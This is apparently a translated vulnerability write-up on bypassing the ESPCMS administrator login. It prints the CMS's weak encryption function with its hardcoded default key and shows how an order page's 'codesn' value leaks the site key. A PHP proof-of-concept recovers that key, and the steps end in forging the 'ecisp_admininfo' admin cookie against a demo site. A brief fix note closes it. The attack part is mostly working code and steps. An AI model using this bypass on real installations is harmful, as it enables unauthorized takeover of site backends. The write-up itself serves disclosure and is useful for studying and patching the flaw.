ESPCMS latest background login bypass DEMO Test
It is also a encryption and decryption function, but it is different from the previous one.
Look at the encryption and decryption functions
function eccode($string, $operation = 'DECODE', $key = '@LFK24s224%@safS3s%1f%', $mcrype = true) {$result = null;if ($operation == 'ENCODE') {if (extension_loaded('mcrypt') && $mcrype) {$result = $this->encryptCookie($string, $key);} else {for ($i = 0; $i < strlen($string); $i++) {$char = substr($string, $i, 1);$keychar = substr($key, ($i % strlen($key)) - 1, 1);$char = chr(ord($char) + ord($keychar));$result.=$char;}$result = base64_encode($result);$result = str_replace(array('+', '/', '='), array('-', '_', ''), $result);}} elseif ($operation == 'DECODE') {if (extension_loaded('mcrypt') && $mcrype) {$result = $this->decryptCookie($string, $key);} else {$data = str_replace(array('-', '_'), array('+', '/'), $string);$mod4 = strlen($data) % 4;if ($mod4) {$data .= substr('====', $mod4);}$string = base64_decode($data);for ($i = 0; $i < strlen($string); $i++) {$char = substr($string, $i, 1);$keychar = substr($key, ($i % strlen($key)) - 1, 1);$char = chr(ord($char) - ord($keychar));$result.=$char;}}}return $result;}
One more sentence than before
if (extension_loaded('mcrypt') && $mcrype) {$result = $this->encryptCookie($string, $key);
If the mcrypt module exists and $ mcrype is true, encryptCookie is called for encryption,
EncryptCookie
function encryptCookie($value, $key = '@LFK24s224%@safS3s%1f%') {if (!$value) {return false;}$iv_size = mcrypt_get_iv_size(MCRYPT_RIJNDAEL_256, MCRYPT_MODE_ECB);$iv = mcrypt_create_iv($iv_size, MCRYPT_RAND);$crypttext = mcrypt_encrypt(MCRYPT_RIJNDAEL_256, md5($key), $value, MCRYPT_MODE_ECB, $iv);return trim(base64_encode($crypttext));}
Php built-in encryption function .. Kneel down.
When encrypting cookie operations such as members and backend users, mcrype is set to true by default. As a result, the previous method does not work.
However, in the/interface/ordermain. php file, the mcrype is set to false when encryption is found.
function in_read() {............$payobj = new $plugcode();$codesn = $this->fun->eccode($plugcode . $read['ordersn'] . $oid, 'ENCODE', db_pscode, FALSE);$respondArray = array('code' => $plugcode, 'ordersn' => $read['ordersn'], 'oid' => $oid, 'codesn' => $codesn);$return_url = $this->get_link('paybackurl', $respondArray, admin_LNG, 0, 1);..........
We can use the previous method to restore the key of this codesn.
The code for checking administrator permissions in the background is as follows:
if (empty($this->esp_username) || empty($this->esp_adminuserid) || md5(admin_AGENT) != $this->esp_useragent || md5(admin_ClassURL) != $this->esp_softurl)
Encrypt with the obtained key
1|admin|md5(password)|md5(admin_AGENT)|1|1|md5(admin_ClassURL)
This value can be used to log on to the background. (Random password. Do not write an error in admin_AGENT and admin_ClassURL. )
Bytes -----------------------------------------------------------------------------------
First, register a user, purchase a product, and go to the order view page,
Review elements,
return_url=http://demo.ecisp.cn/html/cn/index.php?ac=respond&at=payok&codesn=ls6apsXddYWIjpVlk2eVk5SVkmxiZmpyZ3hoanNsbw&code=alipay&ordersn=ESP-201502240614511702&oid=198
Return_url is what we need.
Enter poc,
$ Text = "plaintext"; // The value of code, ordersn, and oid in the obtained string. $ cookie = "ls6apsXddYWIjpVlk2eVk5SVkmxiZmpyZ3hoanNsbw "; // cookie $ bincookie = base64_decode ($ cookie); for ($ j = 0; $ j <strlen ($ text); $ j ++) {echo chr (ord ($ bincookie [$ j])-ord ($ text [$ j]);}
Then
5b16dd028ac5b2eabab6125A6A88B****
Encryption with encryptCookie,
Modify cookie ecisp_admininfo,
You can log on to the background.
Solution:
Do not understand why FALSE is required .. It is best to check the password for Logon detection. Do not trust the data transmitted by the user too much.